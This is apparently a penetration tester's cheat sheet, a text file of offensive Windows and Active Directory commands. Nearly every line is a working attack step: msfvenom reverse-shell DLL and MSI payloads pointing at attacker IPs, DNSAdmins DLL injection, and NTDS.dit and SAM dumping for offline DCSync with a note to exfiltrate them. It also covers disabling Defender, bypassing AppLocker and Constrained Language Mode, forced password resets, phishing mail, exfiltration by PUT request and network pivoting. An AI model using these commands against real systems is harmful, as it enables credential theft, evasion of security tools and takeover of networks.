-
Notifications
You must be signed in to change notification settings - Fork 7
/
Copy pathuserful_commands.txt
57 lines (37 loc) · 3.59 KB
/
userful_commands.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full $env:TEMP' q q" (local dcsync)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.57 LPORT=1337 -f dll -o shell.dll
dnscmd.exe /config /serverlevelplugindll \\10.10.14.57\s\shell.dll;sc.exe \\DCName stop dns;sc.exe \\DCName start dns (Needs to be on DNSADMINS group)
rpcclient $> setuserinfo2 {username} 23 {password} (Needs ForceChangePassword DACL)
Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend (Disable Defender)
Get-MpPreference | Select-Object -Property ExclusionPath -ExpandProperty ExclusionPath (get defender exclusion paths)
Enable-PSRemoting -Force;Set-Item wsman:\localhost\client\trustedhosts * (Enable winrm)
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0;Enable-NetFirewallRule -DisplayGroup "Remote Desktop" (Enable RDP)
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\PSBypassCLM.exe (Get a shell that bypasses CLM)
c:\windows\system32\spool\drivers\color\ (folder that bypasses applocker)
# Abuse seBackupPrivilege/seRestorePrivilege
#0 reg save hklm\sam sam; reg save hklm\system system
#1 unix2dos shadowcopy.txt (in linux attacker machine)
#2 upload shadowcopy to the machine
#3 diskshadow /s shadowcopy.txt
#4 robocopy /B E:\Windows\ntds .\ntds ntds.dit
#5 exfiltrate the files and perform dcsync locally
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=10.10.14.4 LPORT=1339 -f msi > pwn.msi (abuse with msiexec /q /i pwn.msi in victim machine)
Add-MpPreference -ExclusionPath "C:\Temp" (add exclusion path)
Remove-MpPreference -ExclusionPath "C:\Temp"
PowerShell Set-MpPreference -SubmitSamplesConsent 2 (disable automatic send samples for labs etc)
# authenticate on domain and execute command on any computer
#0 $pass=ConvertTo-SecureString "myPass" -AsPlainText -Force
#1 $cred=New-Object System.Management.Automation.PSCredential("domain.local\username",$pass)
#2 Invoke-Command -Computer DC-1 -Credential $cred -ScriptBlock { whoami }
swaks --to [email protected] --from "[email protected]" --header "Subject: Internal web app" --body "http://10.10.14.99:8000/" (Send email with swaks)
Invoke-WebRequest -uri $uri -Method Put -Infile C:\windows\temp\test.txt -ContentType 'application/binary' (exfiltrate file with PUT request)
# fast nmap scans through proxychains
seq 1 1000 | xargs -P 50 -I{} proxychains nmap -p {} -sT -Pn --open -n -T4 --min-parallelism 100 --min-rate 1 --oG proxychains_nmap --append-output <IP Address>
seq 1 254 | xargs -P 50 -I{} proxychains nmap -p 80,443,3389,445,22 -sT -Pn --open -n -T4 --min-parallelism 100 --min-rate 1 --oG proxychains_nmap --append-output 192.168.1.{}
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("aa..."))
# reverse port forwarding for reverse shells agents etc
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=192.168.58.128 connectport=8080 connectaddress=192.168.57.140
netsh advfirewall firewall add rule name="PortForwarding 8080" dir=in action=allow protocol=TCP localport=8080
netsh advfirewall firewall add rule name="PortForwarding 8080" dir=out action=allow protocol=TCP localport=8080
# use sshuttle for VPN-like connection through SSH server
sudo sshuttle --dns -r kali@ssh-ip 0/0 --ssh-cmd 'ssh -i priv_key.pem' -x ssh-ip